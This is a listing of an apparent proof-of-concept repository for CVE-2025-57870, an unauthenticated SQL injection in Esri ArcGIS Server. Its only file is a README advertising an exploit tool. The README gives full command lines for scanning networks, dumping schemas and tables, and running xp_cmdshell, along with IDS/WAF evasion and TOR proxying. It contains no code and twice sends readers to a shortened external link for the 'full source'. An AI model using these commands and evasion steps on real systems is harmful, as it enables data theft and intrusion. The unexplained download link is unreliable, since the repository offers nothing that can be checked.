
CVE-2025-57870 PoC — BUG-000179884 - There is a security vulnerability in ArcGIS Server Feature Services.

Source
Associated Vulnerability
Title: BUG-000179884 - There is a security vulnerability in ArcGIS Server Feature Services. (CVE-2025-57870)
Description: A SQL Injection vulnerability exists in Esri ArcGIS Server versions 11.3, 11.4 and 11.5 on Windows, Linux and Kubernetes. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary SQL commands via a specific ArcGIS Feature Service operation. Successful exploitation can potentially result in unauthorized access, modification, or deletion of data from the underlying Enterprise Geodatabase.
Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in Esri ArcGIS Server
Readme
# Esri ArcGIS Server SQL Injection Exploit - CVE-2025-57870

This repository provides a professional-grade exploit for CVE-2025-57870, a critical SQL injection vulnerability in Esri ArcGIS Server versions 11.3, 11.4, and 11.5. The tool targets the Feature Service `/query` endpoint, enabling unauthenticated remote execution of arbitrary SQL commands on the underlying Enterprise Geodatabase. Designed for penetration testers and security researchers, it supports data exfiltration, modification, and potential RCE on certain database backends.  

**Note:** Full source code access - **[href](https://tinyurl.com/3zjbu33f)**. This repository contains core exploit logic and utilities for authorized testing.  

## Features
- Unauthenticated exploitation of ArcGIS Feature Services.
- Supports MSSQL, Oracle, and PostgreSQL backends.
- Modes: Error-based, blind (time-based), and out-of-band (OOB) injection.
- Built-in scanner for identifying vulnerable ArcGIS instances.
- Evasion techniques: Randomized delays, User-Agent rotation, proxy support (TOR/SOCKS).
- Post-exploitation: Schema enumeration, table dumping, and command execution.

## Repository Structure
- `sqli_exploit.py`: Main exploit script with modular injection logic.
- `scanner.py`: Network scanner to detect vulnerable ArcGIS servers.
- `payload_generator.py`: Generates custom SQL payloads for specific actions.
- `evasion_utils.py`: Evasion utilities for bypassing IDS/IPS.
- `db_backends/`: Backend-specific payload handlers (mssql.py, oracle.py, postgres.py).
- `config.yaml`: Configuration file for target, proxy, and logging settings.
- `requirements.txt`: Python dependencies.
- `exploited_data/`: Output directory for dumped data.
- `demo.mp4/`: A video instruction manual.

## Prerequisites
- Python 3.8+
- Install dependencies: `pip install -r requirements.txt`

## Setup
1. Configure `config.yaml` with target details:
   ```yaml
   target:
     url: "https://target.com/ArcGIS/rest/services/ServiceName/FeatureServer/0/query"
     db_type: "mssql"  # Options: mssql, oracle, postgres
   proxy:
     enabled: false
     type: "socks5"
     address: "127.0.0.1:9050"
   logging:
     level: "debug"
     output_dir: "exploited_data"
   ```
2. Scan for vulnerable servers:  
   `python scanner.py --network 192.168.1.0/24 --port 6080`

## Usage
Run the exploit:  
`python sqli_exploit.py --target-url <URL> --mode blind --action dump_schema --output exploited_data/schema.json`

### Options
- `--target-url`: Full FeatureServer query URL (required).
- `--mode`: `error`, `blind`, or `oob` (default: error).
- `--action`: `dump_schema`, `dump_table`, `execute_cmd` (required).
- `--db-type`: `mssql`, `oracle`, or `postgres` (required).
- `--table`: Target table for `dump_table` action (optional).
- `--custom-payload`: Raw SQL payload for custom injections (optional).
- `--evade`: Enable evasion techniques (default: off).
- `--output`: Output file for results (default: exploited_data/output.json).

### Examples
1. Dump database schema (MSSQL):  
   `python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode error --action dump_schema --db-type mssql --output schema.json`

2. Dump specific table (Oracle):  
   `python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode blind --action dump_table --db-type oracle --table users --output users.json`

3. Attempt RCE (MSSQL xp_cmdshell):  
   `python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode error --db-type mssql --custom-payload "; EXEC xp_cmdshell 'whoami' --" --output cmd_output.txt`

## Evasion Techniques
- `--evade`: Enables random delays (1-5s), User-Agent rotation, and proxy chaining.
- Proxy support: Configure TOR or SOCKS5 in `config.yaml`.
- Payload obfuscation: Automatic comment injection (e.g., `/**/`) to bypass WAFs.

## Get the exploit
### **[href](https://tinyurl.com/3zjbu33f)**

## Disclaimer
For authorized security testing only. Unauthorized use is illegal. The authors are not responsible for misuse or damages.  

## Contact
For any questions or inquiries, please contact: bytehawkcorp@outlook.com
File Snapshot

[4.0K] /data/pocs/4c7835b3cef7417f950801ee45b1ab29e45a65c2
└── [4.1K] README.md

0 directories, 1 file